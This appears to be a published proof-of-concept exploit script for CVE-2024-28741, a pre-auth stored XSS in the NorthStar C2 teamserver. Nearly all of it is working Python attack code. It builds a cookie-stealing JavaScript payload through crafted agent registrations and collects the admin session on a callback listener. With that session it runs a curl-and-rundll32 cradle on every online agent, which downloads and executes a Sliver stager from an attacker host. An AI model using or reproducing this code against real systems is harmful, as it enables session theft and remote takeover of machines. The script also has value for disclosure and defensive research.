NorthStar C2 Agent 1.0 Cross Site Scripting / Remote Command Execution

`# Exploit Title: NorthStar C2 agent RCE via stored XSS  
# Date: 2024-03-11  
# Exploit Author: @_chebuya  
# Software Link: https://github.com/EnginDemirbilek/NorthStarC2  
# Version: v1.0  
# Tested on: Ubuntu 20.04 LTS  
# CVE: CVE-2024-28741  
# Description: NorthStar C2 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page. This XSS can be leveraged to execute commands on NorthStar C2 agents  
# Blog: https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/  
from http.server import BaseHTTPRequestHandler, HTTPServer  
from bs4 import BeautifulSoup  
import requests  
import base64  
import threading  
import time  
import os  
  
class Collector(BaseHTTPRequestHandler):  
def do_GET(self):  
cookie = self.path.split("=")[1]  
print("Cookie: " + cookie)  
self.send_response(200)  
self.end_headers()  
self.wfile.write(b"")  
  
background_thread = threading.Thread(target=steal_agents, args=(cookie,))  
background_thread.start()  
  
self.server.shutdown()  
  
def agent_execute_command(agent_id, csrf_token, headers, command):  
data = {  
'slave': agent_id,  
'command': command,  
'sid': agent_id,  
'token': csrf_token  
}  
  
r = requests.post(target_url + '/functions/setCommand.nonfunction.php', headers=headers, data=data)  
  
while True:  
r = requests.get(target_url + f"/getresponse.php?slave={agent_id}", headers=headers)  
if len(r.text) != 0 or command == "die":  
break  
  
time.sleep(1)  
  
def steal_agents(cookie):  
headers = {  
"Cookie": f"PHPSESSID={cookie}"  
}  
r = requests.get(target_url + "/clients.php", headers=headers)  
soup = BeautifulSoup(r.text, 'html.parser')  
rows = soup.find_all('tr')  
  
agent_ids = []  
hostnames = []  
  
for row in rows:  
cells = row.find_all('td')  
if len(cells) != 9:  
continue  
  
status = cells[7].text.strip()  
if status != 'Online':  
continue  
  
agent_ids.append(cells[1].text.strip())  
hostnames.append(cells[5].text.strip())  
  
  
script_tags = soup.find_all('script')  
  
csrf_token = None  
for script_tag in script_tags:  
if 'csrfToken' in script_tag.text:  
csrf_token = script_tag.text.split('"')[1]  
break  
  
if csrf_token:  
print("CSRF Token:", csrf_token)  
else:  
print("CSRF Token not found")  
return  
  
for i in range(len(agent_ids)):  
agent_id = agent_ids[i]  
hostname = hostnames[i]  
print(f"Stealing {hostname} ({agent_id})...")  
  
print("Enabling shell mode")  
agent_execute_command(agent_id, csrf_token, headers, "enablecmd")  
print(f"Running sliver cradle: {cradle_command}")  
agent_execute_command(agent_id, csrf_token, headers, cradle_command)  
print("Disabling shell mode")  
agent_execute_command(agent_id, csrf_token, headers, "disablecmd")  
print("Sending suicide to slave")  
agent_execute_command(agent_id, csrf_token, headers, "die")  
  
  
print("Exploit finished, exiting")  
os._exit(0)  
  
  
def xor_encryption(text, key):  
encrypted_text = ""  
  
for i in range(len(text)):  
encrypted_text += chr(ord(text[i]) ^ ord(key[i % len(key)]))  
  
return encrypted_text  
  
def generate_sid(sid):  
encrypted_sid = xor_encryption(sid, "northstar")  
  
return base64.urlsafe_b64encode(encrypted_sid.encode()).decode()  
  
def exploit(target_url, callback_url):  
target_url = target_url.rstrip("/") + "/login.php"  
  
protocol = callback_url.split(":")[0] + "://"  
host = callback_url.split("/")[2].split(":")[0]  
h1, h2 = host[:len(host)//2], host[len(host)//2:]  
  
if callback_url.count(":") == 2:  
port = callback_url.split(":")[2]  
else:  
if protocol == "https://":  
port = "443"  
else:  
port = "80"  
  
sid_payloads = ["N*/</script><q", "N*/i.src=u/*q", "N*/new Image;/*q", "N*/var i=/*q", "N*/s+h+p+'/'+c;/*q", "N*/var u=/*q", f"N*/'{protocol}';/*q", "N*/var s=/*q", f"N*/':{port}';/*q", "N*/var p=/*q", "N*/a+b;/*q", "N*/var h=/*q", f"N*/'{h2}';/*q", "N*/var b=/*q", f"N*/'{h1}';/*q", "N*/var a=/*q", "N*/d.cookie;/*q", "N*/var c=/*q", "N*/document;/*q", "N*/var d=/*q", "N</td><script>/*q"]  
for sid in sid_payloads:  
print(sid)  
params = {  
'sid': generate_sid(sid)  
}  
  
requests.get(target_url, params=params, verify=False)  
  
def run(port):  
server_address = ('', int(port))  
httpd = HTTPServer(server_address, Collector)  
print(f'Server running on port {port}')  
httpd.serve_forever()  
  
cradle_command = r"curl http://192.168.1.6:8000/stager.dll > c:\users\public\stager.dll & rundll32 c:\users\public\stager.dll,inject & echo DONE"  
  
callback_host = "192.168.1.6"  
callback_port = "8080"  
  
target_url = "http://192.168.1.4:80"  
callback_url = f"http://{callback_host}:{callback_port}"  
  
print("Sending malicious agent registrations...")  
exploit(target_url, callback_url)  
print("Registrations finished, waiting for execution...")  
run(callback_port)  
`